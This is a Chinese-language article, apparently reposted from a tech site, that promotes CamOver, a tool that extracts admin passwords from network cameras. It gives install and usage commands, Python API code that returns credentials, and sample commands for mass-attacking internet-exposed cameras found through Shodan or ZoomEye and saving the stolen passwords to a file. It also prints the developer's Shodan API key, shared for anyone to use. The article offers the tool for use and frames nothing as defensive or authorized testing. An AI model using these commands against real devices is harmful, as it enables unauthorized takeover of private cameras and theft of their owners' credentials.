CamOver:一款功能强大的摄像头漏洞利用工具

[[414433]]

关于CamOver

CamOver是一款功能强大的摄像头漏洞利用工具,在该工具的帮助下,广大研究人员可以轻松破解掉你家网络摄像头的管理员密码,并接管你的摄像头。

功能介绍

  • 该工具能够发现并利用大多数主流型号网络摄像头中的安全漏洞,例如CCTV、GoAhead和Netwave等。
  • 经过优化,支持多线程同时攻击多个摄像头。
  • 简单的命令行接口和API用法。

工具安装

由于CamOver使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装CamOver:

  1. pip3 install git+https://github.com/EntySec/CamOver 

基础使用

CamOver的使用非常简单,我们只需要在命令行终端中输入“camover”命令即可使用CamOver:

  1. usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] 
  2.  
  3.                [--zoomeye ZOOMEYE] [-p PAGES] 
  4.  
  5.   
  6.  
  7. CamOver is a camera exploitation tool that allows to disclosure network camera 
  8.  
  9. admin password. 
  10.  
  11.   
  12.  
  13. optional arguments: 
  14.  
  15.   -h, --help            显示这个帮助信息并退出 
  16.  
  17.   -t, --threads          启用多线程模式以获得更好的性能 
  18.  
  19.   -o OUTPUT, --output OUTPUT 
  20.  
  21.                         将结果存储至文件 
  22.  
  23.   -i INPUT, --input INPUT 
  24.  
  25.                         地址输入文件 
  26.  
  27.   -a ADDRESS, --address ADDRESS 
  28.  
  29.                         提供单个地址 
  30.  
  31.   --shodan SHODAN       通过网络利用远程设备所使用的Shodan API密钥 
  32.  
  33.   --zoomeye ZOOMEYE     通过网络利用远程设备所使用的ZoomEye API密钥 
  34.  
  35.   -p PAGES, --pages PAGES 
  36.  
  37.                         需要通过ZoomEye获取的页面数量 

工具使用样例

(1) 攻击单个摄像头

下列命令可以攻击单个网络摄像头:

  1. camover -a 192.168.99.100 

(2) 通过网络攻击远程摄像头

接下来,我们可以使用Shodan搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:

  1. camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD 

注意:项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥,你可以使用你自己的密钥,当然了你想用开发人员的也没意见,大家资源共享嘛!

(3) 从输入文件获取目标摄像头

我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:

  1. camover -t -i cameras.txt -o passwords.txt 

注意:此命令将会攻击cameras.txt中给出的所有摄像头,并会将所有获取到的密码存储至passwords.txt文件中。

API使用

CamOver还提供了自己的Python API,可以将其导入至你们自己的项目代码中并调用其功能:

  1. from camover import CamOver 

调用样例

攻击单个摄像头:

  1. from camover import CamOver 
  2.  
  3.   
  4.  
  5. camover = CamOver() 
  6.  
  7. creds = camover.exploit('192.168.99.100') 
  8.  
  9.   
  10.  
  11. print(creds) 

项目地址

CamOver:【GitHub传送门

 

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/134374.html<

(0)
运维的头像运维
上一篇2025-03-01 03:15
下一篇 2025-03-01 03:16

相关推荐

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注